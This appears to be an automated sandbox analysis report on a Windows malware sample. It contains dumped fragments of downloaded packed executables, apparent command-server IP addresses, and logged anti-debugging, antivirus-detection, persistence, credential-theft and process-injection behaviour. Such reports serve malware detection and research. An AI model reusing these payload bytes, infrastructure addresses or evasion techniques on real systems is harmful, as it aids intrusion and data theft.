$D$,é-ÿÿÿf.Aù¯¿J«<AùYÎxAù¤{àeDÈAùnéþÿÿHD$p¾8DÚ÷ÒâÂ @¬DØ%0 ÐÃó 5îoÏÿDÚòÓ°p¬D!Úþ÷ÖýõÓ°p¬!î!ý×÷×AÀAàòãÃ0`D Ã øçòâçp` ú1Ú÷Ð Ðó÷Óê÷ÒßçË¹ïæ4ðF þ ÓâË¹ïå4ðF Õ1õ÷Ó ëÂ÷Òâ\¶Å%£pI: ÐÚ÷Òâ\¶Åã£pI: Ó1ÃiÓéÑ[D$Ó÷ÓØ%Á½âï>B ÂÖöòËÛS<Ø÷ÐDÅõÛS<D!ÅAÈ$ê¬ÃDÇ÷×Ê¢âÇ¶æS, ÖãÇ¶% H$C Ø1ðê÷ÒDÃã÷iç@8 ßA Ðâ÷iå`ú Õ1ýA÷ÐA èÂ÷Òâ%ÛO%Ú$°w ÐDÂ÷Òâ%ÛOAàÚ$°wA ÐA1À¸Àé¢éQýÿÿAù@Í,AùïÖ)ÎAùUÏÕDÈAùÆýÿÿHD$xHø¸uõÿ*ºÊKÕßLÂE1öéûüÿÿAù¿çÄî»AùÊKÕßDÈAù&äíÑüÿÿ¸-]HéÇüÿÿAù,]HAùÒtDëDÈAùÈ2cGüÿÿH$H$H$ ¸¯ê=Þ'~)=ß'tU=~ºÙ-Ë=9Tuàé¹f.=¯ê+=M[Ø¨F=>¬ùu³H$¸ß'=Þ'¦ëÍH¼$k^ hÿ¯èè÷ÐÃãÂåÌå=t3 Ýõ<t31èèÀ=A^ ÃÚÂ0ÃAÙA0ÑÛ¸>¬ù»M[Ø¨EÃH7ÒAEÄH´$¨EÉDÃ=Þ'(ÿÿÿéLÿÿÿò] =ð] Xÿ¯ØÝ÷Õã¼@âè%CR¿ Ø5BR¿åþ ÅýÿAÁÀÿ Âÿ Ã ØD ÊÂØD ÈD0ËÃØ0Ð½ß'AEìÛ¸ß'EÅÒDÅ=Þ'¦þÿÿéÊþÿÿHy¸9TAGÇH$ =Þ'þÿÿé¤þÿÿH$¨¸9T=Þ'cþÿÿéþÿÿAù>^±æAù°¿J«%DÈAù$ v¯úÿÿD$@é¤úÿÿAùÏÂ¨-ÙAùAÍ,DÈAù¡£l-zúÿÿ$$$$$HD$`$$$$$$$$¸{£/éúÿÿAùÙñDÈAùËKùóùÿÿHcD$hHÁàHD$`HD$pHAHÂH÷ÒHÕHåüàH èH1ÂH!ÂHT$x¸gçé´ùÿÿAù¼áfDÈAùF5NqùÿÿD$HéùÿÿAùZÎxDÈAùáD qùÿÿ request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:01 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdchð" `h@@`s (ð )È p- ( Å @(v ð.text `.rdataÄó° ô¢ @@.dataX;° @À.pdata)ð ª @@.B1J Ô `.gxfg@ ò @@.retplne`.tls p@À_RDATAô@@.relocÈ @B.jssL L"@À.jssLð Ln @ÀAWAVAUATVWUSHìH¦£ H1àH$I³ -G³ Xÿ¯ØØ÷Ðàþó ÃûÿD$vAÀAÁý AÂý D$wÃE ÂAØE0ÈA ØD ËDÓDÀ0Ø½ùÉÄ¸lß¦EÅÛDèÖIÎEÀDèA¹lß¦LQ¸4_3YA¸è¯;f=ç¯;)=lß¦t=ùÉÄuëé§¸è¯;=ç¯;~áf.=è¯;ts=4_3YuÂ¶D$vD¶\$wÂòÑ ÁñÃ0ËÁñÙÈD ÙAó4D ØÁÐD ØA0ÓAÃDÚ0ÊAöÃ¸è¯;AEÁöÁADÁöÒöÂAEÀ=ç¯;_ÿÿÿëLT$xè=ç¯;KÿÿÿéoÿÿÿH\|$xLñè ð± DyÿD¯ùEüA÷ÔDââ4Ú0¹EøAàË%ÏFA ÐAð5Ú0¹E àAøÿD$v ·± ÃL$ ù ÁD$w0ËÚöÒ ÊÙ0ÑÛ½ùÉÄ»lß¦EÝÒºlß¦DÚHD$@ÉEÝ\$$A÷ÐInº4_3Y¸è¯;fúç¯;(úlß¦t úùÉÄuèëwºè¯;úç¯;~áfúè¯;tBú4_3YuÀ¶L$v¶T$w0ÊÓó ËÙ0ÑöÁ¹lß¦EÈöÂÊEÐöÃDÑúç¯;~ë¶Hl$xT$$úç¯;yÿÿÿëø÷Ð%fp=AúAâbÂA Â÷ÖAòfp=A òDÐ÷Ð1þ÷Ö!þñ÷ÑDÒâï#%üÜa ÐA Êáï#æüÜa Î1ÆA÷ÒA òH\|$xHÁïDà%Û 'EùAá$ó_ØA ÁAñÚ 'E áAùÿÁD$ ø AÃø ÀÃ Ë0ÁËÚ0Ê¾lß¦ºùÉÄEÖÛ»ùÉÄEÚÉDÚ\$4DááþAçA ÏE1üEüÁÂ ÂA ËAÓÂ Ê0ÈÐÁD0Ù¹ùÉÄEÎºùÉÄÀEÑ\|$LEÛDÑT$0A÷ÑA½B~ÇD$(Hl$8Aý&¦")é÷HD$xA½±¾R-f.fAý&¦"ÓAýF`<¶Aý"Ñb^AýG`<CAýÿÍ<SAýÏFu¶,¯ ¯ Pÿ¯ÐÐ÷Ð% ¬Xâ_éS§ ÂÐ5^éS§àþò¡¬X ÂúÿÀÂù Ãù Á ÈÑ ÓÃØ0ÈÛA½U¯Âº±¾R-DEêÉ¹U¯ÂDEéÀéÍf.Aý°¾R--Aý'¦"ÊAýè°²+ïAýHiý+üþÿÿr® p® Pÿ¯ÐÐ÷Ðàþò ÂÐ÷Ð%ã7ât{È Âòt{ÈÀÂù Ãù Á Ê ÃÓÊ0Â ÁÑÈ0ØÉA½hÑ¸¹ïxDEéÛDDéD\$pÀ¸hÑ¸éAý#ÑbAýïx'AýXõð{TþÿÿHD$XHøA½G`<¸Hiý+DDèE1ÛAý&¦"9þÿÿf.fAý1¼AýÒß½øqAý2¼øAýU¯ÂAý0ößýÿÿEüD$LD$LD$LD$LD$LD$LHD$@D$v\|$ D$w¸4_3Yf.=ç¯;)=lß¦t=ùÉÄuëém¸è¯;=ç¯;~áf.=è¯;tK=4_3YuÂ¶D$v¶L$w4ñÂÊ0ÁÐ0È¨¾è¯;¸lß¦EðöÁð¹è¯;EÁöÂEÆ=ç¯;~ë®Hl$xD$0=ç¯;qÿÿÿëAýv9Ø°)Aýw9Ø°êAýã+n¸AýhÑ¸ÌüÿÿHD$P¾8L$pÊ÷ÒÐ%%á\à ÁÎöÀñh!Ê]ë7Ð÷Ðû÷Óýõ]ë7!Ýç¢xÈáJ/l1æÀ ÎâJ/l1% È Ð1ðé!ù1ïHl$8 ÏÁ÷Ñ!ù÷×!Ç ÏiÇéÑ[\|$hù÷ÑÊ Â÷Ð÷ÒáO¹ç°ãóF Ï÷O¹ Ç÷×Ð!ø1× Ç« « Pÿ¯ÐÐ÷ request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:02 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdQùhð"x3@0ìk``<( ¼ T(&l «@H?À.text `.rdatadÀ Â@@.dataØ(pN@À.pdataT \@@.B8 Àv `.gxfgpÐ@@.retplneð_RDATAô@@.relocl@B.jssv v¤@À.jssv v @À.rsrc¼ @@AWAVAUATVWUSHìH¦`H1àH$õl-ólxÿ¯øû÷ÓçQemØ%÷® ø5ö®ãþ ÃûÿD$:ý D$;T$4IÌ¸ÞwAºhÍÅ A»ñdo¾¶ÓÆ=9ëëmlHÿ¯ÈÈ÷ÐÂâþá Ñ÷Ñ ÁùÿÀ=kl Á0ÈÂöÒ ÊÁ0ÑÀ¸gÅe;½D2ÚYEÅÒºgÅe;DÂÉEÅf.=9ë%=»þX^=fÅe;Ä= òu<=òu<=ÎÍ@³ =ñàòCu»Dl$pDt$tD$LL$t9Á¸¹Ì³¹><â;é«=çékQ=É\|t$=É\|t =üBy =ÞwYÿÿÿD$:L$;Âò0ÈñÑÂ0Ê¨¸övòè½òu<EÅöÁ¹övòèEÁöÂé²=a+P=®9ë§þÿÿ=½uÍþþÿÿHD$XHø¸¼þX¹±LÁE1ÿ=9ëåþÿÿf.=¸Ì³I=±e÷£I=8©5=9©Ú =kT&« =p þÿÿ¸µ´X=9ë~¶éþÿÿ=õvòè>=z«þT=z«þ3 =±6 =BZûIþÿÿ¸©{@¼=9ëiÿÿÿé?þÿÿ=_E[O=¼þXZ =D2ÚYþÿÿ =j=;jQÿ¯ÑÑ÷Ñá(Íâsì×2 ÊÑñsì×2ò(â·ùÍåHø ÕõIøáþ éÊ÷ÒâHMÏá·²ç0 Ññ·²ç0ÁÀÿ Ãÿ Â ÑÂ ÃËÙ0ÑÛ¸ÎÍ@½µ´XEÅÒºÎÍ@é=´´X==ç°<¾ =MTýÿÿ¸.cÁL$dL$,=9ëlþÿÿéBýÿÿ=.cÁ=¹Ì³® =©{@¼ýÿÿ @i=>iQÿ¯ÑÑ÷Ñáõ¿A+â @¾Ô ÊÕõ @¾Ôò¤¹â¬¹ éáSF_ø ÑñRF_øåþ ÍýÿÀÂÿ Ãÿ ÁÑ0ÃÈ0ØºïÄ6©¸BZûEÐÛÐ½ïÄ6©EÅÉEÂ=9ë³ýÿÿéüÿÿ=²e÷£6=ïÄ6©hüÿÿ¸ñàòCE1öDl$<=9ëýÿÿéVüÿÿ=gÅe; =><â;5üÿÿHcD$tHL$@iéÑ[ÈÁèÅ÷Õêâ5Làä ÐÊ÷Ò55L ÐÃ÷Óâp×ñál( Ññp×ñ éÊ÷ÒÅåjiãue ë Èájiâu Ê1Ú÷Ð ÐiÈéÑ[iD$péÑ[÷ÐAÅA ÍDê÷Ò1È÷Ð!ÈÁ÷ÑDíå^Ð?â¡/xÀ êA Íá^Ð?%¡/xÀ È1ÐA÷ÕA ÅDt$tAÆ¸ñàòC=9ëüÿÿéaûÿÿ=èék) =¥Æq@ûÿÿjgHÿ¯ÈÈ÷Ð%÷Ýáã" ÁÈ5ã"ñ£4]á«4Ñ]ÂâTË.¢ ÊòUË.¢àþ ÐøÿÀ="g Á0ÈÂöÒ ÊÁ0ÑÀ¸É\|t½üByEÅÒºÉ\|té²úÿÿ=b+j =7v7®úÿÿ$$$$$$$$$$fHÿ¯ÈÈ÷ÐÂâþá Ñ1ÈÈÀ=tf Á0ÈÂöÒ ÊÁ0ÑÀ¸EÝô½p EÅÒºEÝôéúÿÿ=övòèÙ=¯U#êúÿÿHD$XHø¸½uÍ¹ç°<LÁ=9ëûÿÿéåùÿÿ=`E[É =8`gÄùÿÿ îe=ìeQÿ¯ÑÑ÷Ñá^;Xâ¡óÄ§ ÊÕõ¡óÄ§òX"PâøâfÕéá* Ññ*åþ ÍýÿÁÀÿ Ãÿ Â ÑÂ ÃËÑ0ÙÛ¸gÅe;½®9ëEÅÒºgÅe;EÂT$0$é·=µ´XO =EÝôùÿÿ$$$$$$ request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:02 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL£wLgà "&è+%@@p(ÜÕ'è!d`(D V(@° .text© `.rdata@@@.data@?à@Àss0 `ss18°@Àss2À `.rsrcD `(@@Æ'&9(úÎ# éR h¡9Åd$Ýçh"S_D$f3óÁl$¸öT$fÿÎÀt$æÁd$fö7dfÿÆèh²°7¸h)k?fò7dÀD$¦h=Lfh` (é´þÂ¨U,®n»¹¶~IÄËOBDjóë?«?\|$&ÀUHEÁýeT »cHØç»^ÏÒêà±²hQÃQ/Ü¯ÃÕÉ¬ÛN8UTÀ~Ý$\Ë§!2°ôÀ've_> Å_#úªÙX$¡vÞêE^ ÿ%¿ GÊ8³B:Y_vèä2æ?«Ç§ÆÖ(Bù×ÀT8¾VÑ·À[èãjcÃðP/sæ`#yåÐhS¹ã ue¤÷Õ è7`<êïÈ¦Èebú.ÊäñÒ2;TÉ6ËwäMhJRÞ ÃÝe3§²áÙ8_÷zÛY5««nG²ÒkÂÀ(Û=!ª 2¶Ã¨üóÙdß'§¬ õ°qïtûeSLTêõ#)ýéÇ` OâN¸ÙººöÁ<@xàÑ(7^8`À[ºÀºl8Ñ÷}À%Í>4 ¿ToþV=ÉÐA=§ÊJ{=_$yUé(`DÆû¸ÜvLt{ ùæ¡tûÔt[vÔÚæéE.zlÑ÷.æfW´Ge×¼ZXÙ-(ûVa§_$6}ñt{¯v@Ì)ÏÆ´jôNü®õ@üý]JâåÉsçL³U½ð³[é óÑÈSÂTh¥HÕ0¸»nÎùQ.r×Z§K,¿{U§zéUÿÊèÿWhÕîÙ¿ÂT5x¡ØxcÓÌ=IÈ%éà®:³<CØý)êêÓºtImb¯0joüô zo`ÉþwLV¢ )Ñ $ ;8ßzC/ÁÌûFÑç¯þÄÌ{£lØ]tÌûþëFg:UFýÓéuêáéå.»ò9U Ä¦Lä½$ÔíoÀs~V2hóoj½XÆÉñÙ7¿¥tdÀþj_°MpAvÞ¥K)K²/[úTEã?·ùúÀLû]í«<2z+L{O±º,@ÍÏ[Á°µ ¸³` ¦ÁÀáH6°MíÕÄè¤üi¬I6®äxEzµúÁÃ^¯[^àÙùý$s£]BÇ36ÕP¨Z³`Ýam.¦¥Â[L{_ºü¿éioLûä%§{uU[»L{ßP} Uóc^öåmÆýÛ·.³.Zß:êóUÉôË3ÕwÉIBã_á¹´Lûû»%qVÃ¡óÄ&Û3IÕð(£Ä¨I5´//ÜÈùb>Ì%?úùuÄT/ÿ2á×TÌó[t(±Íåm\"¶·$Ü¾ù1;àÔ ¶þ¬àÑyð!ÄTÛðX#wö/Ê~GÜdo¿Üfòõ3ú;y éð±èé$÷¶ÑfÿÀºø;ó¸9ã8é~fh¨èA»¸XA·ËIâQÇLàþÿþQN¤þGs§D·Ìp?úÿN´Hs§AòA¿ú¸,NJ¬Hs§DÉéÃX¾Rk¨eú§ù ©SsÒxM`L Hf&gØIÊ«d´ÑøÀäáúÀpæWçÖðdUõÊbMì%À%GËÊYh´ê/B\|$³ïHÇD$xnÞ8ÿt$Hd$è^üâ6Õ-ä{¢mwªadrëÄü?ÑùÌ`ÿÆÊ¶¸bU¬ü/¦[¹-xûg,¯û.û ýp¡,¯{ëêf=L>ît1ójÓP â¹ ØÀ;½Ã7T¥Û#»2Ï$.²ï¯Ö/,¯û5æåßÓPtìpSiÓP&ªÍ<¶3#;,éw¤}K¦{ãÒ¤0-âJI°ÌJÞ60©ø[ÖÙ§ $ÎL×ÆT»;RcUÁ?Àeà¤ê~{Ðå ©Âý2ye'zËXÅ4L'AÆTrº¿è@+î/Ê:-¹à@{ËÈM¦8Ôrtièªúú'Ä"Ê¥WQÆT¸4Ñ5FÚÀg\|Ì¿ë^:ï ÒãÉRBncm.Á¤Á2Ì6éU>ÚdðÉ ÔGµêÐ@¶·ð$8¯G<ÁM«Ø29ÇÇ[Xa#g²W·ßÇ9¯Gn¬9k®3ÆQøõ{Tüâ{9«ÿWÞñÆPx!èpöôÀ9®Q¬/ãEÆ[àªÅÅ»/¾Ímb>£×nó"TÀõSmáN£¢>W®ìAfÙ[wmqh³¬¨5AàhéEªx«b`gx þ:[=dcZvbâºÇ é¯¢:ªÒã}}bÀö^KQñpL/)1øx> ç Ç,-õp{àí}^¢$pûzá2ëÑp{>»¡ìPÚc"Uéýrz½X¸ã~ÞÑy ±}£oc`AàÄÇÆdyûÈT`Q-uê~;£À`X¾Ú;ÖVÅ)Êþ]ëÃPa®xuèªV0ÈT}L§KäËR.ïæß´ÇD$Ú(ÐÊéË¹¿E4"f»ÉQHL$AL"ÀD$ HÁt$ IÒfÁd$cè;Ã9rÐjXOU\|6-0N] «÷zñæº¡;Íq\º¯ãi¢l49uña®,VNe¸8$Ë\|ãÇ ¹9½GÃCk8ê·¬/,K:«H ½g¯â@esJóÑ#äÔ!#-vg5û#ºßf_I N§òÙ;QgÖÀsúÙv¹÷+Øþçn¦² request_handle: 0x00cc000c	1	1
InternetReadFile April 21, 2025, 10:02 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ù\ZîZîZî_îìîKîKhPîKhKîKhîSîZîÎî¢i[î¢ih[î¢i[îRichZîPEd²Fhð"+´ÖPv@Ð`\ d°àp3ÀÜ `½p ¼@Ð.text¨³´ `.rdatab\Ð^¸@@.data¤50@À.pdata3p4.@@.rsrcà°b@@.relocÜ Àd@BH\$UH¬$0ÿÿÿHìÐWÀD$03ÛH\$@H\$HA¸HHL$0è ¿WÀD$PH\$`H\$hA¸HpHL$Pèv¿WÀD$pH]H]A¸HLHL$pèN¿WÀEH] H]¨A¸H)HMè(¿WÀE°H]ÀH]ÈA¸HHM°è¿WÀEÐH]àH]èA¸HåHMÐèÜ¾WÀEðH]H]A¸HÃHMðè¶¾WÀEH] H](A¸H¡HMè¾WÀE0H]@H]HA¸HHM0èj¾WÀEPH]`H]hA¸H]HMPèD¾WÀEpHHA¸H5HMpè¾WÀH H¨A¸H Hèæ½WÀ°HÀHÈA¸HàH°è´½HD$0HD$ HÐHD$(HT$ H SèlhL ´kº A¸ HL$0èC^H ØH$àHÄÐ]éaÌÌÌH\$UH¬$PþÿÿHì°WÀD$03ÛH\$@H\$HA¸H>HL$0è½WÀD$PH\$`H\$hA¸ H HL$Pèæ¼WÀD$pH]H]A¸HHL$pè¾¼WÀEH] H]¨A¸HñHMè¼WÀE°H]ÀH]ÈA¸H×HM°èr¼WÀEÐH]àH]èA¸H½HMÐèL¼WÀEðH]H]A¸H£HMðè&¼WÀEH] H](A¸HHMè¼WÀE0H]@H]HA¸HkHM0èÚ»WÀEPH]`H]hA¸HUHMPè´»WÀEpHHA¸H1HMpè»WÀH H¨A¸ H HèV»WÀ°HÀHÈA¸HèH°è$»WÀÐHàHèA¸HÂHÐèòºWÀðHHA¸HHðèÀºWÀH H(A¸HzHèºWÀ0H@HHA¸ HXH0è\ºWÀPH`HhA¸H6HPèºWÀpHHA¸HHpèø¹WÀH H¨A¸HâHèÆ¹HD$0HD$ H°HD$(HT$ H Oè~dL Ægº A¸HL$0èUZH ªH$ÀHÄ°]é1]ÌÌÌÌÌH\$UH¬$PþÿÿHì°WÀD$03ÛH\$@H\$HA¸HJHL$0è ¹WÀD$PH\$`H\$hA¸ H(HL$Pèö¸WÀD$pH]H]A¸ HHL$pèÎ¸WÀEH] H]¨A¸HùHMè¨¸WÀE°H]ÀH]ÈA¸HãHM°è¸WÀEÐH]àH]èA¸HÉHMÐè\¸WÀEðH]H]A¸H«HMðè6¸WÀEH] H](A¸HHMè¸WÀE0H]@H]HA¸HwHM0èê·WÀEPH]`H]hA¸H1HMPèÄ·WÀEpHHA¸H-HMpè·WÀH H¨A¸H Hèf·WÀ°HÀHÈA¸HèH°è4·WÀÐHàHèA¸ H¾HÐè·WÀðHHA¸HHðèÐ¶WÀH H(A¸HzHè¶WÀ0H@HHA¸ HXH0èl¶WÀPH`HhA¸H2HPè:¶WÀpHHA¸HHpè¶WÀH H¨A¸ HâHèÖµHD$0HD$ H°HD$(HT$ H #Kè`L Öcº A¸HL$0èeVH z¦H$ÀHÄ°]éAYÌHì(H ),èDH ¦HÄ(é YHì(A¹HÓ-E3ÀH Y-èH a¦HÄ(éðX@SHì ¹èÔéH -HØèuH¾E3ÀHÓH-H z-èµ H f¦HÄ [é XH5Læ,L§5HÒtHHcHLDPL5H5HÒtHHcHLDPÃÌÌHì(H ,è\H ¦HÄ(é8XH ¦é,XH Q¦é XHì(A¹H.E3ÀH .èH e¦HÄ(éðW@SHì 3Éè×èH Ð-HØèxH½E3ÀHÓH´-H -è¸H m¦H request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0020e400', u'virtual_address': u'0x0000c000', u'entropy': 7.983756134260713, u'name': u'.rsrc', u'virtual_size': u'0x0020f000'}

entropy

7.98375613426

description

A section with a high entropy has been found

entropy

0.984795321637

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 21, 2025, 10:02 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://purl.org/rss/1.0/
url	http://www.passport.com

Yara rule detected in process memory (33 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Hijack network configuration	rule	Hijack_Network
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Queries for potentially installed applications (3 events)

Time & API	Arguments	Return
RegOpenKeyExW April 21, 2025, 10:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d} base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}	2
RegOpenKeyExW April 21, 2025, 10:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}.RebootRequired	2
RegOpenKeyExW April 21, 2025, 10:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d} base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{cd1d4012-e125-4e78-896f-4307e1b9857d}	2

Communicates with host for which no DNS query was performed (2 events)

host	185.215.113.41
host	185.215.113.59

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 190 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA April 21, 2025, 10 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 10 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 21, 2025, 10:01 a.m.	class_name: OLLYDBG window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0				reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file	C:\Windows\Tasks\namez.job

Deletes executed files from disk (1 event)

file	C:\Windows\Temp\{EF976DFB-4649-42AA-AF77-3A03FEF11467}\.ba\Portal-Ech64.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2796 resumed a thread in remote process 2788
NtResumeThread April 21, 2025, 10:02 a.m.	thread_handle: 0x00000138 suspend_count: 0 process_identifier: 2788	1	0	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
